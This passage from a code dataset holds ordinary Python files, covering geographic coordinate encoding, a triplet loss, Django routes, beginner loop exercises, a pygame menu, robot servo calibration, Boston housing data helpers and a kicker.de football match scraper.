(other.latitude, 
other.longitude))\n\n\nclass GeoCoordinatesSeries(list):\n @staticmethod\n def check_instance(item):\n if not isinstance(item, GeoCoordinates):\n raise TypeError('item is not of type GeoCoordinates')\n\n def __init__(self, lst):\n if isinstance(lst, basestring):\n lst = GeoCoordinatesSeries.parse_string(lst)\n for item in lst:\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).__init__(lst)\n\n def __setitem__(self, key, item):\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).__setitem__(key, item)\n\n def __contains__(self, item):\n self.check_instance(item)\n return super(GeoCoordinatesSeries, self).__contains__(item)\n\n def append(self, item):\n self.check_instance(item)\n super(GeoCoordinatesSeries, self).append(item)\n\n def __str__(self):\n result = \"\"\n prev_lat = 0\n prev_lng = 0\n for pt in self:\n lat_d = int(round(1e5 * (float(pt.latitude) - prev_lat)))\n lng_d = int(round(1e5 * (float(pt.longitude) - prev_lng)))\n result += encode_signed_number(lat_d) + encode_signed_number(lng_d)\n prev_lat += lat_d / 1e5\n prev_lng += lng_d / 1e5\n return result\n\n @staticmethod\n def parse_string(encoded):\n result = []\n lat = 0\n lon = 0\n while len(encoded) > 0:\n lat_d, encoded = decode_number(encoded)\n lon_d, encoded = decode_number(encoded)\n lat += lat_d\n lon += lon_d\n result.append(GeoCoordinates(lat / 1e5, lon / 1e5))\n return result\n\n\nclass GeoLocation(object):\n\n @staticmethod\n def min_length(timestamp_precision=None, coords_precision=None, separator=\":\", \n coords_separator=\",\"):\n min_len = (TIMESTAMP_MIN_LENGTH + len(separator) +\n GeoCoordinates.min_length(coords_precision,\n coords_separator))\n if timestamp_precision is not None and timestamp_precision > 0:\n return min_len + 1 + timestamp_precision\n return min_len\n\n def __init__(self, timestamp, coordinates):\n self._timestamp = None\n self.timestamp = timestamp\n if isinstance(coordinates, GeoCoordinates):\n self.coordinates = coordinates\n elif isinstance(coordinates, (list, tuple)) and len(coordinates) == 2:\n self.coordinates = GeoCoordinates(coordinates[0], coordinates[1])\n else:\n raise ValueError(\"Wrong parameter 'coordinates', \"\n \"expecting GeoCoordinates or a tuple\")\n\n def get_datetime(self):\n return datetime.fromtimestamp(self._timestamp, utc)\n\n def get_timestamp(self):\n return self._timestamp\n\n def set_timestamp(self, value):\n if isinstance(value, datetime):\n value = str(calendar.timegm(value.timetuple()))\n elif isinstance(value, float) or isinstance(value, int):\n value = str(value)\n timestamp = Decimal(value)\n self._timestamp = timestamp\n\n timestamp = property(get_timestamp, set_timestamp)\n\n def format_string(self, timestamp_precision=None, coords_precision=None, ):\n data = \"%s:%s\" % (self._timestamp, self.coordinates)\n if len(data) <= GeoLocation.min_length():\n return data\n return \"%s:%s\" % ((\"%s\" % self._timestamp)[:17], self.coordinates)\n\n def __str__(self):\n return self.format_string()\n\n def __repr__(self):\n return \"GeoLocation(%s)\" % str(self)\n\n def __len__(self):\n return len(str(self))\n\n def __eq__(self, other):\n return (isinstance(other, GeoLocation)\n and self.coordinates == other.coordinates\n and self.timestamp == other.timestamp)\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def __cmp__(self, other):\n if not isinstance(other, GeoLocation):\n raise TypeError('Can only compare to other instances of '\n 'GeoLocation')\n return cmp((self.timestamp, self.coordinates),\n (other.timestamp, 
other.coordinates))\n\n\nclass GeoLocationSeries(object):\n @staticmethod\n def check_instance(item):\n if not isinstance(item, GeoLocation):\n raise TypeError('item is not of type GeoLocation')\n\n def __init__(self, lst=None):\n if lst is None:\n lst = []\n if isinstance(lst, basestring):\n lst = GeoLocationSeries.parse_string(lst)\n decorated = sorted(lst)\n self._keys = [item.timestamp for item in decorated]\n self._items = [item for item in decorated]\n for item in lst:\n self.check_instance(item)\n\n def clear(self):\n self.__init__([])\n\n def copy(self):\n return self.__class__(self)\n\n def __len__(self):\n return len(self._items)\n\n def __getitem__(self, i):\n return self._items[i]\n\n def __iter__(self):\n return iter(self._items)\n\n def __reversed__(self):\n return reversed(self._items)\n\n def __repr__(self):\n return '%s(%r)' % (\n self.__class__.__name__,\n self._items\n )\n\n def __reduce__(self):\n return self.__class__, self._items\n\n def __contains__(self, item):\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n j = bisect_right(self._keys, k)\n return item in self._items[i:j]\n\n def index(self, item):\n \"\"\"Find the position of an item. Raise ValueError if not found.\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n j = bisect_right(self._keys, k)\n return self._items[i:j].index(item) + i\n\n def count(self, item):\n \"\"\"Return number of occurrences of item\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n j = bisect_right(self._keys, k)\n return self._items[i:j].count(item)\n\n def insert(self, item):\n \"\"\"Insert a new item. If equal keys are found, replace item\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_left(self._keys, k)\n if i < len(self._keys) and self._keys[i] == k:\n self._items[i] = item\n else:\n self._keys.insert(i, k)\n self._items.insert(i, item)\n\n def insert_right(self, item):\n \"\"\"Insert a new item. If equal keys are found, add to the right\"\"\"\n self.check_instance(item)\n k = item.timestamp\n i = bisect_right(self._keys, k)\n self._keys.insert(i, k)\n self._items.insert(i, item)\n\n def remove(self, item):\n \"\"\"Remove first occurrence of item. Raise ValueError if not found\"\"\"\n self.check_instance(item)\n i = self.index(item)\n del self._keys[i]\n del self._items[i]\n\n def find(self, k):\n \"\"\"Return first item with a key == k.\n Raise ValueError if not found.\"\"\"\n i = bisect_left(self._keys, k)\n if i != len(self) and self._keys[i] == k:\n return self._items[i]\n raise ValueError('No item found with key equal to: %r' % (k,))\n\n def find_lte(self, k):\n \"\"\"Return last item with a key <= k. Raise ValueError if not found.\"\"\"\n i = bisect_right(self._keys, k)\n if i:\n return self._items[i - 1]\n raise ValueError('No item found with key at or below: %r' % (k,))\n\n def find_lt(self, k):\n \"\"\"Return last item with a key < k. Raise ValueError if not found.\"\"\"\n i = bisect_left(self._keys, k)\n if i:\n return self._items[i - 1]\n raise ValueError('No item found with key below: %r' % (k,))\n\n def find_gte(self, k):\n \"\"\"Return first item with a key >= k.\n Raise ValueError if not found\"\"\"\n i = bisect_left(self._keys, k)\n if i != len(self):\n return self._items[i]\n raise ValueError('No item found with key at or above: %r' % (k,))\n\n def find_gt(self, k):\n \"\"\"Return first item with a key > k. 
Raise ValueError if not found\"\"\"\n i = bisect_right(self._keys, k)\n if i != len(self):\n return self._items[i]\n raise ValueError('No item found with key above: %r' % (k,))\n\n def __str__(self):\n result = \"\"\n prev_tim = Y2K_TIMESTAMP\n prev_lat = 0\n prev_lng = 0\n for pt in self:\n coord = pt.coordinates\n tim_d = int(round(float(pt.timestamp) - prev_tim))\n lat_d = int(round(1e5 * (float(coord.latitude) - prev_lat)))\n lng_d = int(round(1e5 * (float(coord.longitude) - prev_lng)))\n result += (encode_signed_number(tim_d)\n + encode_signed_number(lat_d)\n + encode_signed_number(lng_d))\n prev_tim += tim_d\n prev_lat += lat_d / 1e5\n prev_lng += lng_d / 1e5\n return result\n\n @staticmethod\n def parse_string(encoded):\n result = []\n tim = Y2K_TIMESTAMP\n lat = 0\n lon = 0\n while len(encoded) > 0:\n tim_d, encoded = decode_number(encoded)\n lat_d, encoded = decode_number(encoded)\n lon_d, encoded = decode_number(encoded)\n tim += tim_d\n lat += lat_d\n lon += lon_d\n result.append(GeoLocation(tim, (lat / 1e5, lon / 1e5)))\n return result\n\n def __eq__(self, other):\n return isinstance(other, GeoLocationSeries) \\\n and self._items == other._items\n\n def __ne__(self, other):\n return not self.__eq__(other)\n\n def union(self, other):\n out = self.copy()\n for item in other._items:\n out.insert(item)\n return out\n","sub_path":"globetrotting/utils/geo_objects.py","file_name":"geo_objects.py","file_ext":"py","file_size_in_byte":14038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
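
The `geo_objects.py` record above implements a delta-plus-varint scheme in the spirit of Google's encoded polyline format; `GeoLocationSeries` additionally delta-encodes timestamps against `Y2K_TIMESTAMP`. A minimal round-trip sketch, assuming the module is importable as `geo_objects` and runs under Python 2 (it relies on `basestring` and `cmp`):

```python
from geo_objects import GeoCoordinates, GeoCoordinatesSeries

series = GeoCoordinatesSeries([GeoCoordinates(38.5, -120.2),
                               GeoCoordinates(40.7, -120.95)])
encoded = str(series)                    # deltas scaled by 1e5, varint-packed
decoded = GeoCoordinatesSeries(encoded)  # a string argument triggers parse_string
for original, restored in zip(series, decoded):
    print('%s -> %s' % (original, restored))  # equal up to 1e-5 rounding
```
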
+{"seq_id":"604697903","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n FileName [ tri_loss.py ]\r\n PackageName [ final ]\r\n Synopsis [ Self defined triplet loss loading methods. ]\r\n\r\n Example:\r\n python3.7 preprocess_features.py --dataroot ./IMDb_resize/\r\n\"\"\"\r\nimport torch\r\nimport torch.nn as nn\r\n\r\ndef triplet_loss(inputs, labels: list, cast_num: int, triplet_criterion, norm_criterion=None):\r\n \"\"\"\r\n Self define triplet loss function.\r\n\r\n Params:\r\n - inputs: Tensor _(num_cast + num_cand) x 2048\r\n - labels: List _(num_cast + num_cand) x 1\r\n - cast_num: int _ number of casts\r\n\r\n Description:\r\n - x_a: The candidates' images\r\n - x_p: The casts' images\r\n - x_n: The candidates' images\r\n\r\n Return:\r\n - loss\r\n \"\"\"\r\n\r\n batchsize = inputs.shape[0]\r\n candidate_num = batchsize - cast_num\r\n\r\n inputs = inputs.reshape(batchsize, -1)\r\n\r\n x_a, x_p = inputs[cast_num:], inputs[:cast_num]\r\n\r\n labels = torch.LongTensor(labels)\r\n\r\n index_a = labels[cast_num:]\r\n index_n = torch.randint(0, cast_num, size=(candidate_num, ))\r\n\r\n # If index_n is equal to index_a, random again.\r\n while (index_n == index_a).nonzero().shape[0] > 0:\r\n n = (index_n == index_a).nonzero().numel()\r\n index_n[index_n == index_a] = torch.randint(0, cast_num, size=(n, ))\r\n\r\n # Make the P/N Pairs with index_p and index_n\r\n # print(\"index_n :\", index_n)\r\n # print(\"index_p :\", index_p)\r\n # print(\"x_p.shape ;\", x_p.shape)\r\n # print()\r\n x_p, x_n = x_p[index_a], x_p[index_n]\r\n\r\n if norm_criterion is not None:\r\n loss = triplet_criterion(x_a, x_p, x_n) + norm_criterion(x_a) + norm_criterion(x_n)\r\n return loss\r\n \r\n loss = triplet_criterion(x_a, x_p, x_n)\r\n return loss\r\n","sub_path":"tri_loss.py","file_name":"tri_loss.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"462532911","text":"import os\n\n## Computational function\ndef task_id(i):\n host = host = os.popen(\"hostname\").read()[:-1]\n ps = os.popen(\"cat /proc/self/stat | awk '{print $39}'\").read()[:-1]\n return \"Task ID: %s, Hostanem: %s, CPU ID: %s\" % (i, host, ps)\n\n## Iterate to run the computational function\nfor t in [int(os.getenv('SLURM_ARRAY_TASK_ID'))]:\n print(task_id(t))\n","sub_path":"analysis/array-test.py","file_name":"array-test.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"406969942","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n # Old busted\n url(r'^create_old/$',\n views.create_adj_allocation,\n name='create_adj_allocation'),\n url(r'^edit_old/$',\n views.draw_adjudicators_edit,\n name='draw_adjudicators_edit'),\n url(r'^_get_old/$',\n views.draw_adjudicators_get,\n name='draw_adjudicators_get'),\n url(r'^_update_importance/$',\n views.update_debate_importance,\n name='update_debate_importance'),\n url(r'^conflicts_old/$',\n views.adj_conflicts,\n name='adj_conflicts'),\n url(r'^save/$',\n views.SaveAdjudicatorsView.as_view(),\n name='save_adjudicators'),\n # New Hotness\n url(r'^edit/$',\n views.EditAdjudicatorAllocationView.as_view(),\n name='edit_adj_allocation'),\n url(r'^create/$',\n views.CreateAutoAllocation.as_view(),\n name='create_auto_allocation'),\n url(r'^importance/set/$',\n views.SaveDebateImportance.as_view(),\n name='save_debate_importance'),\n url(r'^panel/set/$',\n views.SaveDebatePanel.as_view(),\n name='save_debate_panel'),\n]\n","sub_path":"tabbycat/adjallocation/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"249060158","text":"# while循环\n\n# n = 1\n# while n < 50:\n# \tprint('当前n的值为: %s'%n)\n# \tn+=2\n\n\n#for循环字符串\n\n# list = ['a','b','c']\n# for f in list:\n# \tprint('当前的值为:%s'%f)\n\n# for循环数字\n\n# num =[1,2,3]\n# for x in num:\n# \tprint('当前数字为:%s'%x)\n\n\n\n# for循环字典\n# zidian = {'name':'阳','age':'22'}\n# for x in zidian:\n# \tprint('当前n的值为:%s:%s'%(x,zidian[x]))\n\n# 循环遍历字典:简洁方式(在for循环中可以使用序列解包)\n\n# zidian = {'name':'阳','age':'22'}\n# for key,value in zidian.items():\n# \tprint('%s:%s'%(key,value))\n\n\nstudent = ['张三','李四','王五','马六']\nnumber = ['1001','1002','1003','1004']\n\n# 并行迭代\n\n# range,i是索引\n# for i in range(len(student)):\n\t# print(student[i],'的学号是: ',number[i])\n\n# Python 内置zip函数\n\n# for name,num in zip(student,number):\n# \tprint(name,'的学号是',num) #结果与上面的一样\n\n# zip函数可以作用于任意数量的序列,可以应付不等长的序列,当短序用完时程序就会停止\n# for num1,num2 in zip(range(3),range(100)):\n# \tprint('zip的值为:',num1,num2)\n\n\n# 翻转和排序迭代\n#sorted() 排序方法 返回一个列表\n# sorted([6,4,7,1]) \n# >>> [1,4,6,7]\n\n# sorted('v5solle')\n# >>> ['5', 'e', 'l', 'l', 'o', 's', 'v']\n\n\n# 跳出循环\n\n# num = 10\n# while num > 0:\n# \tprint('当前num的值为:',num)\n# \tnum -=1\n# \tif num == 8:\n# \t\tbreak\n\n\n\n# 循环中的else语句\n\n# while\n# num = 0\n# while num < 4:\n# \tprint(num,'小于四')\n# \tnum = num+1\n# else:\n# \tprint('当前num的值大于四了')\n\n# for循环\n\n# name = ['小明','小智']\n# for x in name:\n# \tif x == '小红':\n# \t\tprint('名称',x)\n# \t\tbreak\n# else:\n# \tprint('米有玄幻到')\n\n\n# pass语句: 空语句 不做任何事情 只是为了程序的结构占位\n\n# name = ['小明','小红']\n\n# for i in name:\n# \tif i == '小明':\n# \t\tprint(i)\n# \telif i == '小红':\n# \t\t# print(i) 这里不能为空,为空的话会报错,这里使用pass语句\n# \t\tpass\n# \telse:\n# \t\tprint('什么都没偶')\n\n\n\n### 猜数字游戏\n\n\n# import random\n\n# number = random.randint(1,100)\n\n# index = 0\n# while True:\n# \tvalue = input('请输入1-100之间的一个数字')\n# \tindex+=1\n# \tif not value.isdigit():\n# \t\tprint('必须输入数字')\n# \telif int(value) < 0 or int(value) > 100:\n# \t\tprint('输入的数字必须在1-100之间')\n# \telif number == int(value):\n# \t\tprint('恭喜你答对了,你一共输入了%s次,真是个大笨蛋哦'%index)\n# \telif number < int(value):\n# \t\tprint('你输入的值太大了')\n# \telif number > int(value):\n# \t\tprint('你输入的值太小了')\n# \telse: \n# \t\tprint('程序出错了')\n\n\n### 九九乘法表\nfor i in range (1,10):\n for j in range(1,10):\n print(j,\"x\",i,\"=\",i*j,\"\\t\",end=\"\")\n if i==j:\n print(\"\")\n # break\n\n\n\n\n# name = 'xiao'\n# if name == 'xiao':\n# \tprint('小')\n# elif name == 'da':\n# \tprint('大')\n# \tpass\n# else:\n# \tprint('错误')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Python3.5从零开始/Code/01循环和迭代工具.py","file_name":"01循环和迭代工具.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"281628102","text":"import numpy\r\nimport matplotlib.pyplot as plt\r\n\r\na = numpy.arange(40,50)\r\nb = numpy.arange(50,60)\r\nplt.title(\"Simple Line Plot\")\r\nplt.xlabel(\"X-Axis\")\r\nplt.ylabel(\"Y-Axis\")\r\nplt.plot(a, b)\r\nplt.show()","sub_path":"Day1/q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"93803280","text":"\"\"\"\r\nQuestion 19 :\r\n You are required to write a program to sort the (name, age, height)\r\n tuple by ascending order where name is string, age and height are\r\n numbers. The tuple are input by console. The sort criteria is\r\n 1 : Sort based on name; 2 : Then sort based on age;\r\n 3 : Then sort by score. The priority is that name->age->score.\r\n If the following tuples are given as input to the program:\r\n Tom,19,80 John,20,90 Jony,17,91 Jony,17,93 Json,21,85 Then,\r\n the output of the program should be : [('Jonh', '20', '90'),\r\n ('Jony', '17', '91'),('Jony', '17', '93'), ('Json', '21', '85'), ('Tom', '19', '60')]\r\n\r\n Hints : In case of input data being supplied to the question,\r\n it should be assumed to be a console input. We use itemgetter\r\n to enable multiple sort keys.\r\n\"\"\"\r\n\r\n# Solution : from operator import itemgetter, attrgetter\r\n\r\nfrom operator import *\r\n\r\n# OR\r\n\r\n# from operator import itemgetter, attrgetter\r\n\r\nl = []\r\nwhile True:\r\n sen = input(\"Enter a name age and score : \")\r\n if not sen:\r\n break\r\n l.append(tuple(sen.split(\",\")))\r\n\r\nprint(sorted(l, key=itemgetter(0, 1, 2)))\r\n\r\n\"\"\"\r\nOutput : \r\n Enter a name age and score : Tom,19,80\r\n Enter a name age and score : John,20,90\r\n Enter a name age and score : Jony,17,91\r\n Enter a name age and score : Jony,17,93\r\n Enter a name age and score : Json,21,85\r\n Enter a name age and score : \r\n [('John', '20', '90'), ('Jony', '17', '91'), ('Jony', '17', '93'), ('Json', '21', '85'), ('Tom', '19', '80')]\r\n\"\"\"\r\n","sub_path":"Question-19.py","file_name":"Question-19.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"285898815","text":"import pygame\n\npygame.init()\n\ndisplay_width = 900\ndisplay_heigh = 1200\n\nwindow = pygame.display.set_mode((display_width, display_heigh))\n\npygame.display.set_caption('KittyMama')\n\nclock = pygame.time.Clock()\n\ngameDisplay = pygame.Surface((display_width, display_heigh))\nsurface = pygame.image.load(\"1.jpg\")\nwindow.blit(surface, (0, 0))\npygame.display.flip()\n\nmyfont = pygame.font.SysFont(\"comicsansms\", 16)\nscore = 0\n\ndef text_objects(text, font):\n textSurface = font.render(text, True, [255, 255, 255])\n return textSurface, textSurface.get_rect()\n\n\ndef button (msg, x, y, w, h, ic, ac, action=None ):\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n\n if (x+w > mouse[0] > x) and (y+h > mouse[1] > y):\n pygame.draw.rect(window, (0,0,0), (x, y, w, h))\n if (click[0] == 1 and action != None):\n if (action == \"Start\"):\n import Game\n Game.game_loop()\n elif (action == \"Exit\"):\n pygame.quit()\n else:\n pygame.draw.rect(window, (0,0,0), (x, y, w, h))\n smallText = pygame.font.SysFont(\"comicsansms\", 50)\n textSurf, textRect = text_objects(msg, smallText)\n textRect.center = ( (x+(w/2)), (y+(h/2)) )\n window.blit(textSurf, textRect)\n\ndone = True\nwhile done:\n window.blit(surface, (0, 0))\n\n scoretext = myfont.render(\"Your score {0}\".format(score), 1, (0, 0, 0))\n window.blit(scoretext, (5, 10))\n score += 1\n\n button(\"Restart\", 600, 120, 120, 25, (255, 255, 255),(0, 0, 0), \"Start\")\n button(\"Exit\", 600, 620, 120, 25, (0, 0, 0), (255, 255, 255), \"Exit\")\n pygame.display.update()\n\n for e in pygame.event.get():\n if e.type == pygame.QUIT:\n done = False\n\n\n clock.tick(40)\npygame.quit()\nquit()\n\n","sub_path":"RestartMenu.py","file_name":"RestartMenu.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"649228542","text":"import pigpio\nfrom src.HardwareInterface import (\n send_servo_commands,\n initialize_pwm,\n pwm_to_duty_cycle,\n send_servo_command,\n)\nfrom src.PupperConfig import PWMParams, ServoParams\nimport numpy as np\n\n\ndef getMotorName(i, j):\n motor_type = {0: \"Abduction\", 1: \"Inner\", 2: \"Outer\"} # Top # Bottom\n leg_pos = {0: \"Front Right\", 1: \"Front Left\", 2: \"Back Right\", 3: \"Back Left\"}\n final_name = motor_type[i] + \" \" + leg_pos[j]\n return final_name\n\n\ndef getMotorSetPoint(i, j):\n data = [[0, 0, 0, 0], [45, 45, 45, 45], [45, 45, 45, 45]]\n return data[i][j]\n\n\ndef getUserInput(request):\n measured_angle = float(input(request))\n return measured_angle\n\n\ndef degreesToRadians(input_array):\n return np.pi / 180.0 * input_array\n\n\ndef stepUntil(servo_params, pi_board, pwm_params, kValue, i_index, j_index, set_point):\n # returns the (program_angle) once the real angle matches the pre-defined set point\n foundPosition = False\n set_names = [\"horizontal\", \"horizontal\", \"vertical\"]\n\n offset = 0\n\n while not foundPosition:\n aboveOrBelow = str(\n input(\"Is the leg 'above' or 'below' \" + set_names[i_index] + \"? Input: \")\n )\n if aboveOrBelow == \"above\" or aboveOrBelow == \"a\":\n offset += 1.0\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians(set_point + offset),\n i_index,\n j_index,\n )\n elif aboveOrBelow == \"below\" or aboveOrBelow == \"b\":\n offset -= 1.0\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians(set_point + offset),\n i_index,\n j_index,\n )\n elif aboveOrBelow == \"done\" or aboveOrBelow == \"d\":\n foundPosition = True\n print(\"offset: \", offset, \" original: \", set_point)\n\n return offset\n\n\ndef calibrateB(servo_params, pi_board, pwm_params):\n \"\"\"Calibrate the angle offset for the twelve motors on the robot. Note that servo_params is modified in-place.\n Parameters\n ----------\n servo_params : ServoParams\n Servo parameters. 
This variable is updated in-place.\n pi_board : Pi\n RaspberryPi object.\n pwm_params : PWMParams\n PWMParams object.\n \"\"\"\n\n # Found K value of (11.4)\n kValue = getUserInput(\n \"Please provide a K value (microseconds per degree) for your servos: \"\n )\n servo_params.micros_per_rad = kValue * 180 / np.pi\n\n servo_params.neutral_angle_degrees = np.zeros((3, 4))\n\n for j in range(4):\n for i in range(3):\n # Loop until we're satisfied with the calibration\n completed = False\n while not completed:\n motor_name = getMotorName(i, j)\n print(\"Currently calibrating \" + motor_name + \"...\")\n set_point = getMotorSetPoint(i, j)\n\n # Move servo to set_point angle\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians(set_point),\n i,\n j,\n )\n\n # Adjust the angle using keyboard input until it matches the reference angle\n offset = stepUntil(\n servo_params, pi_board, pwm_params, kValue, i, j, set_point\n )\n print(\"Final offset: \", offset)\n\n # The upper leg link has a different equation because we're calibrating to make it horizontal, not vertical\n if i == 1:\n servo_params.neutral_angle_degrees[i, j] = set_point - offset\n else:\n servo_params.neutral_angle_degrees[i, j] = -(set_point + offset)\n print(\"New beta angle: \", servo_params.neutral_angle_degrees[i, j])\n\n # Send the servo command using the new beta value and check that it's ok\n send_servo_command(\n pi_board,\n pwm_params,\n servo_params,\n degreesToRadians([0, 45, -45][i]),\n i,\n j,\n )\n okay = \"\"\n while okay not in [\"yes\", \"no\"]:\n okay = str(\n input(\"Check angle. Are you satisfied? Enter 'yes' or 'no']\")\n )\n completed = okay == \"yes\"\n\n # (real_angle) = s*(program_angle) - (beta)\n # (beta) = s*(program_angle) - (real_angle)\n\n\ndef main():\n \"\"\"Main program\n \"\"\"\n pi_board = pigpio.pi()\n pwm_params = PWMParams()\n servo_params = ServoParams()\n initialize_pwm(pi_board, pwm_params)\n\n calibrateB(servo_params, pi_board, pwm_params)\n print(\"Calibrated neutral angles:\")\n print(servo_params.neutral_angle_degrees)\n \"\"\"\n servo_params.neutral_angle_degrees = np.array(\n [[8, 3, 0, 0], [45, 48, 45, 45], [-50, -38, -45, -45]]\n )\n\n ref_position = np.pi/180.0 * np.array([[0, 0, 0, 0], [0, 0, 45, 45], [-45,-45, -45, -45]])\n send_servo_commands(pi_board, pwm_params, servo_params, ref_position)\n \"\"\"\n\n\nmain()\n\n# self.servo_multipliers = np.array(\n# [[1, 1, 1, 1], [-1, 1, 1, -1], [1, -1, 1, -1]]\n# )\n","sub_path":"calibrate_servos.py","file_name":"calibrate_servos.py","file_ext":"py","file_size_in_byte":5412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
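
The beta bookkeeping at the end of `calibrateB` follows the closing comment's relation `(beta) = s*(program_angle) - (real_angle)`; a worked example with hypothetical numbers:

```python
# Hypothetical calibration of one joint:
set_point = 45.0  # commanded angle in degrees
offset = 3.0      # extra degrees stepped before the leg looked level

# Upper leg link (i == 1) is calibrated against horizontal:
beta_upper = set_point - offset     # 42.0
# Abduction/lower links are calibrated against vertical, with flipped sign:
beta_other = -(set_point + offset)  # -48.0
```
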
+{"seq_id":"297402865","text":"\"\"\"\nAI Class\n\nUtility functions\n\n\"\"\"\n\ndef load_Boston_housing_data(test_ratio=0.2, feature_ind = None, random_state=0, print_info=False):\n \"\"\"\n Load Boston Dataset from Sklearn.\n \n Args:\n test_ratio(float) : a proportion between train set and test set. Default = 0.2\n feature_ind(list(int)) : a list of index feature to be extracted from the original data set. No indication\n means that all feature is chosen.\n random_state(int) : a seed value for shuffling between values\n print_info(boolean) : True if print the information of data set. Default: False\n \n Returns:\n a tuple of four np.array data sets train_data, test_data, train_targets, test_targets\n \n \"\"\"\n from sklearn.datasets import load_boston\n from sklearn.model_selection import train_test_split\n\n boston_data = load_boston()\n \n if print_info:\n print(boston_data['DESCR'])\n \n if len(feature_ind) > 0:\n print(\"Selected original features are %s\" % boston_data.feature_names[feature_ind])\n return train_test_split(boston_data.data[:, feature_ind], \\\n boston_data.target, \\\n test_size=test_ratio, \\\n random_state=random_state)\n else:\n print(\"All original features are selected\")\n return train_test_split(boston_data.data, \\\n boston_data.target, \\\n test_size=test_ratio, \\\n random_state=random_state)\n\ndef timing(function, *args):\n \"\"\"\n A function measured an amount of time to run a program\n \"\"\"\n import time\n\n start = time.time()\n function(*args)\n end = time.time()\n return start, end\n\ndef scatter_plot(X, y, title=\"Scatter Plot\", x_label=\"Name of feature\", y_label=\"Name of targets\"):\n \"\"\"\n A function to draw a scatter plot \n \n Args:\n X(np.array) : Instances/ Examples/ Features/ Data\n y(np.array) : Targets\n title (str) : Title of a plot\n x_label (str) : Name of x label\n y_label (str) : Name of y label\n \n Returns:\n an visualization exported as an PNG image.\n \"\"\"\n import matplotlib.pyplot as plt\n\n plt.title(title)\n plt.scatter(X, y)\n plt.xlabel(x_label)\n plt.ylabel(y_label)\n plt.show()\n plt.close()\n\nfrom seaborn import pairplot\n\n\n","sub_path":"VietAI/Code/Linear Regression/utils_function.py","file_name":"utils_function.py","file_ext":"py","file_size_in_byte":2464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"34533282","text":"import scrapy\nfrom datetime import datetime\nfrom kspider.items import MatchItem\n\n\nclass MatchSpider(scrapy.Spider):\n name = \"matches\"\n\n def start_requests(self):\n yield scrapy.Request('https://www.kicker.de/{}/spieltag/{}/{}'.format(self.league, self.season, self.start))\n\n def parse(self, response):\n\n for match in response.css('.kick__v100-gameList__gameRow'):\n matchURL = match.css(\n '.kick__v100-gameList__gameRow__stateCell a::attr(href)').get()\n if matchURL is not None:\n kickID = matchURL.split('/')[1]\n yield response.follow('/{}/spielinfo/'.format(kickID), callback=self.parseSpielinfo)\n\n if self.recursive:\n for a in response.css('.kick__pagination__cell-go-forward a'):\n yield response.follow(a, callback=self.parse)\n\n def parseSpielinfo(self, response):\n\n def extract_with_css(query):\n datapoint = response.css(query).get(default='').strip()\n if datapoint == \"-\":\n return \"\"\n return datapoint\n\n m = MatchItem()\n\n stadion = response.css('.kick__gameinfo__item--game-preview '\n ':nth-child(3) p::text').getall()\n if len(stadion) > 1:\n m['stadium'] = \" \".join(stadion[1].strip().split())\n else:\n m['stadium'] = ''\n m['matchID'] = response.url.split('/')[-3]\n\n datestring = extract_with_css('.kick__gameinfo__item--game-preview '\n ':nth-child(2) p::text')\n try:\n date = datetime.strptime(datestring, '%d.%m.%Y, %H:%M')\n except:\n try:\n date = datetime.strptime(datestring, '%d.%m.%Y')\n except:\n date = None\n m['datetime'] = date\n m['league'] = self.league\n m['season'] = self.season\n m['matchday'] = extract_with_css('.kick__v100-scoreboardInfo a::text')\n m['homeTeam'] = extract_with_css(\n 'div.kick__v100-gameCell__team__name:nth-child(1)::text')\n m['awayTeam'] = extract_with_css(\n 'div.kick__v100-gameCell__team__name:nth-child(2)::text')\n m['homeGoals'] = extract_with_css(\n 'div.kick__v100-scoreBoard div:nth-child(1) div:nth-child(1)::text')\n m['awayGoals'] = extract_with_css(\n 'div.kick__v100-scoreBoard div:nth-child(1) div:nth-child(3)::text')\n m['referee'] = extract_with_css('.kick__gameinfo__person a::text')\n m['attendance'] = extract_with_css(\n '.kick__gameinfo__item--game-preview .kick__tabular-nums p::text')\n\n yield m\n","sub_path":"kspider/spiders/matches.py","file_name":"matches.py","file_ext":"py","file_size_in_byte":2666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
